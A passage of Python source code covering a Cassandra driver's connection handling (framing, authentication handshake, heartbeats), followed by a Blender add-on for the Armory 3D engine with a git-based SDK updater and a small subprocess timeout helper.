make sense to just have a driver-global TPE? t = Thread(target=err_all_callbacks) t.daemon = True t.start() def get_request_id(self): """ This must be called while self.lock is held. """ try: return self.request_ids.popleft() except IndexError: new_request_id = self.highest_request_id + 1 # in_flight checks should guarantee this assert new_request_id <= self.max_request_id self.highest_request_id = new_request_id return self.highest_request_id def handle_pushed(self, response): log.debug("Message pushed from server: %r", response) for cb in self._push_watchers.get(response.event_type, []): try: cb(response.event_args) except Exception: log.exception("Pushed event handler errored, ignoring:") def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None): if self.is_defunct: raise ConnectionShutdown("Connection to %s is defunct" % self.host) elif self.is_closed: raise ConnectionShutdown("Connection to %s is closed" % self.host) # queue the decoder function with the request # this allows us to inject custom functions per request to encode, decode messages self._requests[request_id] = (cb, decoder, result_metadata) msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version) self.push(msg) return len(msg) def wait_for_response(self, msg, timeout=None): return self.wait_for_responses(msg, timeout=timeout)[0] def wait_for_responses(self, *msgs, **kwargs): """ Returns a list of (success, response) tuples. If success is False, response will be an Exception. Otherwise, response will be the normal query response. If fail_on_error was left as True and one of the requests failed, the corresponding Exception will be raised. """ if self.is_closed or self.is_defunct: raise ConnectionShutdown("Connection %s is already closed" % (self, )) timeout = kwargs.get('timeout') fail_on_error = kwargs.get('fail_on_error', True) waiter = ResponseWaiter(self, len(msgs), fail_on_error) # busy wait for sufficient space on the connection messages_sent = 0 while True: needed = len(msgs) - messages_sent with self.lock: available = min(needed, self.max_request_id - self.in_flight + 1) request_ids = [self.get_request_id() for _ in range(available)] self.in_flight += available for i, request_id in enumerate(request_ids): self.send_msg(msgs[messages_sent + i], request_id, partial(waiter.got_response, index=messages_sent + i)) messages_sent += available if messages_sent == len(msgs): break else: if timeout is not None: timeout -= 0.01 if timeout <= 0.0: raise OperationTimedOut() time.sleep(0.01) try: return waiter.deliver(timeout) except OperationTimedOut: raise except Exception as exc: self.defunct(exc) raise def register_watcher(self, event_type, callback, register_timeout=None): """ Register a callback for a given event type. """ self._push_watchers[event_type].add(callback) self.wait_for_response( RegisterMessage(event_list=[event_type]), timeout=register_timeout) def register_watchers(self, type_callback_dict, register_timeout=None): """ Register multiple callback/event type pairs, expressed as a dict. """ for event_type, callback in type_callback_dict.items(): self._push_watchers[event_type].add(callback) self.wait_for_response( RegisterMessage(event_list=type_callback_dict.keys()), timeout=register_timeout) def control_conn_disposed(self): self.is_control_connection = False self._push_watchers = {} @defunct_on_error def _read_frame_header(self): buf = self._iobuf.getvalue() pos = len(buf) if pos: version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK if version > ProtocolVersion.MAX_SUPPORTED: raise ProtocolError("This version of the driver does not support protocol version %d" % version) frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2 # this frame header struct is everything after the version byte header_size = frame_header.size + 1 if pos >= header_size: flags, stream, op, body_len = frame_header.unpack_from(buf, 1) if body_len < 0: raise ProtocolError("Received negative body length: %r" % body_len) self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size) return pos def _reset_frame(self): self._iobuf = io.BytesIO(self._iobuf.read()) self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6) self._current_frame = None def process_io_buffer(self): while True: if not self._current_frame: pos = self._read_frame_header() else: pos = self._iobuf.tell() if not self._current_frame or pos < self._current_frame.end_pos: # we don't have a complete header yet or we # already saw a header, but we don't have a # complete message yet return else: frame = self._current_frame self._iobuf.seek(frame.body_offset) msg = self._iobuf.read(frame.end_pos - frame.body_offset) self.process_msg(frame, msg) self._reset_frame() @defunct_on_error def process_msg(self, header, body): self.msg_received = True stream_id = header.stream if stream_id < 0: callback = None decoder = ProtocolHandler.decode_message result_metadata = None else: try: callback, decoder, result_metadata = self._requests.pop(stream_id) # This can only happen if the stream_id was # removed due to an OperationTimedOut except KeyError: return with self.lock: self.request_ids.append(stream_id) try: response = decoder(header.version, self.user_type_map, stream_id, header.flags, header.opcode, body, self.decompressor, result_metadata) except Exception as exc: log.exception("Error decoding response from Cassandra. " "%s; buffer: %r", header, self._iobuf.getvalue()) if callback is not None: callback(exc) self.defunct(exc) return try: if stream_id >= 0: if isinstance(response, ProtocolException): if 'unsupported protocol version' in response.message: self.is_unsupported_proto_version = True else: log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg()) self.defunct(response) if callback is not None: callback(response) else: self.handle_pushed(response) except Exception: log.exception("Callback handler errored, ignoring:") @defunct_on_error def _send_options_message(self): if self.cql_version is None and (not self.compression or not locally_supported_compressions): log.debug("Not sending options message for new connection(%s) to %s " "because compression is disabled and a cql version was not " "specified", id(self), self.host) self._compressor = None self.cql_version = DEFAULT_CQL_VERSION self._send_startup_message(no_compact=self.no_compact) else: log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.host) self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response) @defunct_on_error def _handle_options_response(self, options_response): if self.is_defunct: return if not isinstance(options_response, SupportedMessage): if isinstance(options_response, ConnectionException): raise options_response else: log.error("Did not get expected SupportedMessage response; " "instead, got: %s", options_response) raise ConnectionException("Did not get expected SupportedMessage " "response; instead, got: %s" % (options_response,)) log.debug("Received options response on new connection (%s) from %s", id(self), self.host) supported_cql_versions = options_response.cql_versions remote_supported_compressions = options_response.options['COMPRESSION'] if self.cql_version: if self.cql_version not in supported_cql_versions: raise ProtocolError( "cql_version %r is not supported by remote (w/ native " "protocol). Supported versions: %r" % (self.cql_version, supported_cql_versions)) else: self.cql_version = supported_cql_versions[0] self._compressor = None compression_type = None if self.compression: overlap = (set(locally_supported_compressions.keys()) & set(remote_supported_compressions)) if len(overlap) == 0: log.debug("No available compression types supported on both ends." " locally supported: %r. remotely supported: %r", locally_supported_compressions.keys(), remote_supported_compressions) else: compression_type = None if isinstance(self.compression, six.string_types): # the user picked a specific compression type ('snappy' or 'lz4') if self.compression not in remote_supported_compressions: raise ProtocolError( "The requested compression type (%s) is not supported by the Cassandra server at %s" % (self.compression, self.host)) compression_type = self.compression else: # our locally supported compressions are ordered to prefer # lz4, if available for k in locally_supported_compressions.keys(): if k in overlap: compression_type = k break # set the decompressor here, but set the compressor only after # a successful Ready message self._compressor, self.decompressor = \ locally_supported_compressions[compression_type] self._send_startup_message(compression_type, no_compact=self.no_compact) @defunct_on_error def _send_startup_message(self, compression=None, no_compact=False): log.debug("Sending StartupMessage on %s", self) opts = {} if compression: opts['COMPRESSION'] = compression if no_compact: opts['NO_COMPACT'] = 'true' sm = StartupMessage(cqlversion=self.cql_version, options=opts) self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response) log.debug("Sent StartupMessage on %s", self) @defunct_on_error def _handle_startup_response(self, startup_response, did_authenticate=False): if self.is_defunct: return if isinstance(startup_response, ReadyMessage): if self.authenticator: log.warning("An authentication challenge was not sent, " "this is suspicious because the driver expects " "authentication (configured authenticator = %s)", self.authenticator.__class__.__name__) log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.host) if self._compressor: self.compressor = self._compressor self.connected_event.set() elif isinstance(startup_response, AuthenticateMessage): log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s", id(self), self.host, startup_response.authenticator) if self.authenticator is None: raise AuthenticationFailed('Remote end requires authentication.') if isinstance(self.authenticator, dict): log.debug("Sending credentials-based auth response on %s", self) cm = CredentialsMessage(creds=self.authenticator) callback = partial(self._handle_startup_response, did_authenticate=True) self.send_msg(cm, self.get_request_id(), cb=callback) else: log.debug("Sending SASL-based auth response on %s", self) self.authenticator.server_authenticator_class = startup_response.authenticator initial_response = self.authenticator.initial_response() initial_response = "" if initial_response is None else initial_response self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response) elif isinstance(startup_response, ErrorMessage): log.debug("Received ErrorMessage on new connection (%s) from %s: %s", id(self), self.host, startup_response.summary_msg()) if did_authenticate: raise AuthenticationFailed( "Failed to authenticate to %s: %s" % (self.host, startup_response.summary_msg())) else: raise ConnectionException( "Failed to initialize new connection to %s: %s" % (self.host, startup_response.summary_msg())) elif isinstance(startup_response, ConnectionShutdown): log.debug("Connection to %s was closed during the startup handshake", (self.host)) raise startup_response else: msg = "Unexpected response during Connection setup: %r" log.error(msg, startup_response) raise ProtocolError(msg % (startup_response,)) @defunct_on_error def _handle_auth_response(self, auth_response): if self.is_defunct: return if isinstance(auth_response, AuthSuccessMessage): log.debug("Connection %s successfully authenticated", self) self.authenticator.on_authentication_success(auth_response.token) if self._compressor: self.compressor = self._compressor self.connected_event.set() elif isinstance(auth_response, AuthChallengeMessage): response = self.authenticator.evaluate_challenge(auth_response.challenge) msg = AuthResponseMessage("" if response is None else response) log.debug("Responding to auth challenge on %s", self) self.send_msg(msg, self.get_request_id(), self._handle_auth_response) elif isinstance(auth_response, ErrorMessage): log.debug("Received ErrorMessage on new connection (%s) from %s: %s", id(self), self.host, auth_response.summary_msg()) raise AuthenticationFailed( "Failed to authenticate to %s: %s" % (self.host, auth_response.summary_msg())) elif isinstance(auth_response, ConnectionShutdown): log.debug("Connection to %s was closed during the authentication process", self.host) raise auth_response else: msg = "Unexpected response during Connection authentication to %s: %r" log.error(msg, self.host, auth_response) raise ProtocolError(msg % (self.host, auth_response)) def set_keyspace_blocking(self, keyspace): if not keyspace or keyspace == self.keyspace: return query = QueryMessage(query='USE "%s"' % (keyspace,), consistency_level=ConsistencyLevel.ONE) try: result = self.wait_for_response(query) except InvalidRequestException as ire: # the keyspace probably doesn't exist raise ire.to_exception() except Exception as exc: conn_exc = ConnectionException( "Problem while setting keyspace: %r" % (exc,), self.host) self.defunct(conn_exc) raise conn_exc if isinstance(result, ResultMessage): self.keyspace = keyspace else: conn_exc = ConnectionException( "Problem while setting keyspace: %r" % (result,), self.host) self.defunct(conn_exc) raise conn_exc def set_keyspace_async(self, keyspace, callback): """ Use this in order to avoid deadlocking the event loop thread. When the operation completes, `callback` will be called with two arguments: this connection and an Exception if an error occurred, otherwise :const:`None`. This method will always increment :attr:`.in_flight` attribute, even if it doesn't need to make a request, just to maintain an ":attr:`.in_flight` is incremented" invariant. """ # Here we increment in_flight unconditionally, whether we need to issue # a request or not. This is bad, but allows callers -- specifically # _set_keyspace_for_all_conns -- to assume that we increment # self.in_flight during this call. This allows the passed callback to # safely call HostConnection{Pool,}.return_connection on this # Connection. # # We use a busy wait on the lock here because: # - we'll only spin if the connection is at max capacity, which is very # unlikely for a set_keyspace call # - it allows us to avoid signaling a condition every time a request completes while True: with self.lock: if self.in_flight < self.max_request_id: self.in_flight += 1 break time.sleep(0.001) if not keyspace or keyspace == self.keyspace: callback(self, None) return query = QueryMessage(query='USE "%s"' % (keyspace,), consistency_level=ConsistencyLevel.ONE) def process_result(result): if isinstance(result, ResultMessage): self.keyspace = keyspace callback(self, None) elif isinstance(result, InvalidRequestException): callback(self, result.to_exception()) else: callback(self, self.defunct(ConnectionException( "Problem while setting keyspace: %r" % (result,), self.host))) # We've incremented self.in_flight above, so we "have permission" to # acquire a new request id request_id = self.get_request_id() self.send_msg(query, request_id, process_result) @property def is_idle(self): return not self.msg_received def reset_idle(self): self.msg_received = False def __str__(self): status = "" if self.is_defunct: status = " (defunct)" elif self.is_closed: status = " (closed)" return "<%s(%r) %s:%d%s>" % (self.__class__.__name__, id(self), self.host, self.port, status) __repr__ = __str__ class ResponseWaiter(object): def __init__(self, connection, num_responses, fail_on_error): self.connection = connection self.pending = num_responses self.fail_on_error = fail_on_error self.error = None self.responses = [None] * num_responses self.event = Event() def got_response(self, response, index): with self.connection.lock: self.connection.in_flight -= 1 if isinstance(response, Exception): if hasattr(response, 'to_exception'): response = response.to_exception() if self.fail_on_error: self.error = response self.event.set() else: self.responses[index] = (False, response) else: if not self.fail_on_error: self.responses[index] = (True, response) else: self.responses[index] = response self.pending -= 1 if not self.pending: self.event.set() def deliver(self, timeout=None): """ If fail_on_error was set to False, a list of (success, response) tuples will be returned. If success is False, response will be an Exception. Otherwise, response will be the normal query response. If fail_on_error was left as True and one of the requests failed, the corresponding Exception will be raised. Otherwise, the normal response will be returned. """ self.event.wait(timeout) if self.error: raise self.error elif not self.event.is_set(): raise OperationTimedOut() else: return self.responses class HeartbeatFuture(object): def __init__(self, connection, owner): self._exception = None self._event = Event() self.connection = connection self.owner = owner log.debug("Sending options message heartbeat on idle connection (%s) %s", id(connection), connection.host) with connection.lock: if connection.in_flight <= connection.max_request_id: connection.in_flight += 1 connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback) else: self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold") self._event.set() def wait(self, timeout): self._event.wait(timeout) if self._event.is_set(): if self._exception: raise self._exception else: raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.host) def _options_callback(self, response): if isinstance(response, SupportedMessage): log.debug("Received options response on connection (%s) from %s", id(self.connection), self.connection.host) else: if isinstance(response, ConnectionException): self._exception = response else: self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s" % (response,)) self._event.set() class ConnectionHeartbeat(Thread): def __init__(self, interval_sec, get_connection_holders, timeout): Thread.__init__(self, name="Connection heartbeat") self._interval = interval_sec self._timeout = timeout self._get_connection_holders = get_connection_holders self._shutdown_event = Event() self.daemon = True self.start() class ShutdownException(Exception): pass def run(self): self._shutdown_event.wait(self._interval) while not self._shutdown_event.is_set(): start_time = time.time() futures = [] failed_connections = [] try: for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]: for connection in connections: self._raise_if_stopped() if not (connection.is_defunct or connection.is_closed): if connection.is_idle: try: futures.append(HeartbeatFuture(connection, owner)) except Exception as e: log.warning("Failed sending heartbeat message on connection (%s) to %s", id(connection), connection.host) failed_connections.append((connection, owner, e)) else: connection.reset_idle() else: log.debug("Cannot send heartbeat message on connection (%s) to %s", id(connection), connection.host) # make sure the owner sees this defunt/closed connection owner.return_connection(connection) self._raise_if_stopped() # Wait max `self._timeout` seconds for all HeartbeatFutures to complete timeout = self._timeout start_time = time.time() for f in futures: self._raise_if_stopped() connection = f.connection try: f.wait(timeout) # TODO: move this, along with connection locks in pool, down into Connection with connection.lock: connection.in_flight -= 1 connection.reset_idle() except Exception as e: log.warning("Heartbeat failed for connection (%s) to %s", id(connection), connection.host) failed_connections.append((f.connection, f.owner, e)) timeout = self._timeout - (time.time() - start_time) for connection, owner, exc in failed_connections: self._raise_if_stopped() if not connection.is_control_connection: # Only HostConnection supports shutdown_on_error owner.shutdown_on_error = True connection.defunct(exc) owner.return_connection(connection) except self.ShutdownException: pass except Exception: log.error("Failed connection heartbeat", exc_info=True) elapsed = time.time() - start_time self._shutdown_event.wait(max(self._interval - elapsed, 0.01)) def stop(self): self._shutdown_event.set() self.join() def _raise_if_stopped(self): if self._shutdown_event.is_set(): raise self.ShutdownException() class Timer(object): canceled = False def __init__(self, timeout, callback): self.end = time.time() + timeout self.callback = callback def __lt__(self, other): return self.end < other.end def cancel(self): self.canceled = True def finish(self, time_now): if self.canceled: return True if time_now >= self.end: self.callback() return True return False class TimerManager(object): def __init__(self): self._queue = [] self._new_timers = [] def add_timer(self, timer): """ called from client thread with a Timer object """ self._new_timers.append((timer.end, timer)) def service_timeouts(self): """ run callbacks on all expired timers Called from the event thread :return: next end time, or None """ queue = self._queue if self._new_timers: new_timers = self._new_timers while new_timers: heappush(queue, new_timers.pop()) if queue: now = time.time() while queue: try: timer = queue[0][1] if timer.finish(now): heappop(queue) else: return timer.end except Exception: log.exception("Exception while servicing timeout callback: ") @property def next_timeout(self): try: return self._queue[0][0] except IndexError: pass
armory.py
# Armory 3D Engine # https://github.com/armory3d/armory bl_info = { "name": "Armory", "category": "Render", "location": "Properties -> Render -> Armory Player", "description": "3D Game Engine for Blender", "author": "Armory3D.org", "version": (0, 6, 0), "blender": (2, 80, 0), "wiki_url": "http://armory3d.org/manual", "tracker_url": "https://github.com/armory3d/armory/issues" } import os import sys import stat import shutil import webbrowser import subprocess import threading import bpy import platform from bpy.types import Operator, AddonPreferences from bpy.props import * from bpy.app.handlers import persistent def get_os(): s = platform.system() if s == 'Windows': return 'win' elif s == 'Darwin': return 'mac' else: return 'linux' class ArmoryAddonPreferences(AddonPreferences): bl_idname = __name__ def sdk_path_update(self, context): if self.skip_update: return self.skip_update = True self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/' def ffmpeg_path_update(self, context): if self.skip_update: return self.skip_update = True self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0] def renderdoc_path_update(self, context): if self.skip_update: return self.skip_update = True self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0] sdk_bundled: BoolProperty(name="Bundled SDK", default=True) sdk_path: StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="") show_advanced: BoolProperty(name="Show Advanced", default=False) player_gapi_win: EnumProperty( items = [('direct3d11', 'Auto', 'direct3d11'), ('opengl', 'OpenGL', 'opengl'), ('direct3d11', 'Direct3D11', 'direct3d11')], name="Player Graphics API", default='direct3d11', description='Use this graphics API when launching the game in Krom player(F5)') player_gapi_linux: EnumProperty( items = [('opengl', 'Auto', 'opengl'), ('opengl', 'OpenGL', 'opengl')], name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)') player_gapi_mac: EnumProperty( items = [('opengl', 'Auto', 'opengl'), ('opengl', 'OpenGL', 'opengl')], name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)') code_editor: EnumProperty( items = [('kodestudio', 'Kode Studio', 'kodestudio'), ('default', 'System Default', 'default')], name="Code Editor", default='kodestudio', description='Use this editor for editing scripts') ui_scale: FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0) khamake_threads: IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1) renderdoc_path: StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="") ffmpeg_path: StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="") save_on_build: BoolProperty(name="Save on Build", description="Save .blend", default=False) legacy_shaders: BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False) relative_paths: BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False) viewport_controls: EnumProperty( items=[('qwerty', 'qwerty', 'qwerty'), ('azerty', 'azerty', 'azerty')], name="Viewport Controls", default='qwerty', description='Viewport camera mode controls') skip_update: BoolProperty(name="", default=False) def draw(self, context): self.skip_update = False layout = self.layout layout.label(text="Welcome to Armory! Click 'Save Preferences' at the bottom to keep Armory enabled.") p = bundled_sdk_path() if os.path.exists(p): layout.prop(self, "sdk_bundled") if not self.sdk_bundled: layout.prop(self, "sdk_path") else: layout.prop(self, "sdk_path") box = layout.box().column() box.label(text="Armory Updater") box.label(text="Note: Development version may run unstable!") row = box.row(align=True) row.alignment = 'EXPAND' row.operator("arm_addon.help", icon="URL") row.operator("arm_addon.update", icon="FILE_REFRESH") row.operator("arm_addon.restore") box.label(text="Check console for download progress. Please restart Blender after successful SDK update.") layout.prop(self, "show_advanced") if self.show_advanced: box = layout.box().column() box.prop(self, "player_gapi_" + get_os()) box.prop(self, "code_editor") box.prop(self, "renderdoc_path") box.prop(self, "ffmpeg_path") box.prop(self, "viewport_controls") box.prop(self, "ui_scale") box.prop(self, "khamake_threads") box.prop(self, "save_on_build") box.prop(self, "legacy_shaders") box.prop(self, "relative_paths") def bundled_sdk_path(): if get_os() == 'mac': # SDK on MacOS is located in .app folder due to security p = bpy.app.binary_path if p.endswith('Contents/MacOS/blender'): return p[:-len('Contents/MacOS/blender')] + '/armsdk/' else: return p[:-len('Contents/MacOS/./blender')] + '/armsdk/' elif get_os() == 'linux': # /blender return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/' else: # /blender.exe return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/' def get_fp(): if bpy.data.filepath == '': return '' s = bpy.data.filepath.split(os.path.sep) s.pop() return os.path.sep.join(s) def get_sdk_path(context): user_preferences = context.user_preferences addon_prefs = user_preferences.addons["armory"].preferences p = bundled_sdk_path() if os.path.exists(get_fp() + '/armsdk'): return get_fp() + '/armsdk' elif os.path.exists(p) and addon_prefs.sdk_bundled: return p else: return addon_prefs.sdk_path def remove_readonly(func, path, excinfo): os.chmod(path, stat.S_IWRITE) func(path) def run_proc(cmd, done): def fn(p, done): p.wait() if done != None: done() p = subprocess.Popen(cmd) threading.Thread(target=fn, args=(p, done)).start() return p def git_clone(done, p, gitn, n, recursive=False): if not os.path.exists(p + '/' + n + '_backup'): os.rename(p + '/' + n, p + '/' + n + '_backup') if os.path.exists(p + '/' + n): shutil.rmtree(p + '/' + n, onerror=remove_readonly) if recursive: run_proc(['git', 'clone', '--recursive', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1', '--shallow-submodules', '--jobs', '4'], done) else: run_proc(['git', 'clone', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1'], done) def restore_repo(p, n): if os.path.exists(p + '/' + n + '_backup'): if os.path.exists(p + '/' + n): shutil.rmtree(p + '/' + n, onerror=remove_readonly) os.rename(p + '/' + n + '_backup', p + '/' + n) class ArmAddonStartButton(bpy.types.Operator): '''Start Armory integration''' bl_idname = "arm_addon.start" bl_label = "Start" running = False def execute(self, context): sdk_path = get_sdk_path(context) if sdk_path == "": print("Configure Armory SDK path first") return {"CANCELLED"} scripts_path = sdk_path + "/armory/blender/" sys.path.append(scripts_path) local_sdk = os.path.exists(get_fp() + '/armsdk') import start start.register(local_sdk=local_sdk) ArmAddonStartButton.running = True return {"FINISHED"} class ArmAddonStopButton(bpy.types.Operator): '''Stop Armory integration''' bl_idname = "arm_addon.stop" bl_label = "Stop" def execute(self, context): import start start.unregister() ArmAddonStartButton.running = False return {"FINISHED"} class ArmAddonUpdateButton(bpy.types.Operator): '''Update Armory SDK''' bl_idname = "arm_addon.update" bl_label = "Update SDK" bl_description = "Update to the latest development version" def execute(self, context): sdk_path = get_sdk_path(context) if sdk_path == "": self.report({"ERROR"}, "Configure Armory SDK path first") return {"CANCELLED"} self.report({'INFO'}, 'Updating Armory SDK, check console for details.') print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories') os.chdir(sdk_path) global repos_updated global repos_total repos_updated = 0 repos_total = 9 def done(): global repos_updated global repos_total repos_updated += 1 if repos_updated == repos_total: print('Armory SDK updated, please restart Blender') git_clone(done, sdk_path, 'armory3d/armory', 'armory') git_clone(done, sdk_path, 'armory3d/iron', 'iron') git_clone(done, sdk_path, 'armory3d/haxebullet', 'lib/haxebullet') git_clone(done, sdk_path, 'armory3d/haxerecast', 'lib/haxerecast') git_clone(done, sdk_path, 'armory3d/zui', 'lib/zui') git_clone(done, sdk_path, 'armory3d/armory_tools', 'lib/armory_tools') git_clone(done, sdk_path, 'armory3d/iron_format', 'lib/iron_format') git_clone(done, sdk_path, 'armory3d/Krom_bin', 'Krom') git_clone(done, sdk_path, 'Kode/Kha', 'Kha', recursive=True) return {"FINISHED"} class ArmAddonRestoreButton(bpy.types.Operator): '''Update Armory SDK''' bl_idname = "arm_addon.restore" bl_label = "Restore SDK" bl_description = "Restore stable version" def execute(self, context): sdk_path = get_sdk_path(context) if sdk_path == "": self.report({"ERROR"}, "Configure Armory SDK path first") return {"CANCELLED"} os.chdir(sdk_path) restore_repo(sdk_path, 'armory') restore_repo(sdk_path, 'iron') restore_repo(sdk_path, 'lib/haxebullet') restore_repo(sdk_path, 'lib/haxerecast') restore_repo(sdk_path, 'lib/zui') restore_repo(sdk_path, 'lib/armory_tools') restore_repo(sdk_path, 'lib/iron_format') restore_repo(sdk_path, 'Kha') restore_repo(sdk_path, 'Krom') self.report({'INFO'}, 'Restored stable version') return {"FINISHED"} class ArmAddonHelpButton(bpy.types.Operator): '''Updater help''' bl_idname = "arm_addon.help" bl_label = "Help" bl_description = "Git is required for Armory Updater to work" def execute(self, context): webbrowser.open('https://armory3d.org/manual/#/dev/gitversion') return {"FINISHED"} @persistent def on_load_post(context): if ArmAddonStartButton.running: return bpy.ops.arm_addon.start() def register(): bpy.utils.register_class(ArmoryAddonPreferences) bpy.utils.register_class(ArmAddonStartButton) bpy.utils.register_class(ArmAddonStopButton) bpy.utils.register_class(ArmAddonUpdateButton) bpy.utils.register_class(ArmAddonRestoreButton) bpy.utils.register_class(ArmAddonHelpButton) bpy.app.handlers.load_post.append(on_load_post) def unregister(): bpy.ops.arm_addon.stop() bpy.utils.unregister_class(ArmoryAddonPreferences) bpy.utils.unregister_class(ArmAddonStartButton) bpy.utils.unregister_class(ArmAddonStopButton) bpy.utils.unregister_class(ArmAddonUpdateButton) bpy.utils.unregister_class(ArmAddonRestoreButton) bpy.utils.unregister_class(ArmAddonHelpButton) bpy.app.handlers.load_post.remove(on_load_post) if __name__ == "__main__": register()
timeout.py
import time from multiprocessing import Process # Note: this does not return any return values of the function, just the exit status INTERVAL = 0.1 def run_with_timeout(timeout, fn, *kwargs): def runner(fn, kwargs): try: fn(*kwargs) except Exception as e: print(e) raise e process = Process(target=runner, args=(fn, kwargs)) process.start() counter = 0 while process.is_alive(): time.sleep(INTERVAL) counter+=1 if (counter * INTERVAL) > timeout: process.terminate() raise TimeoutError("Function timed out!") if process.exitcode != 0: raise RuntimeError("Test failed with exit code: ", str(process.exitcode))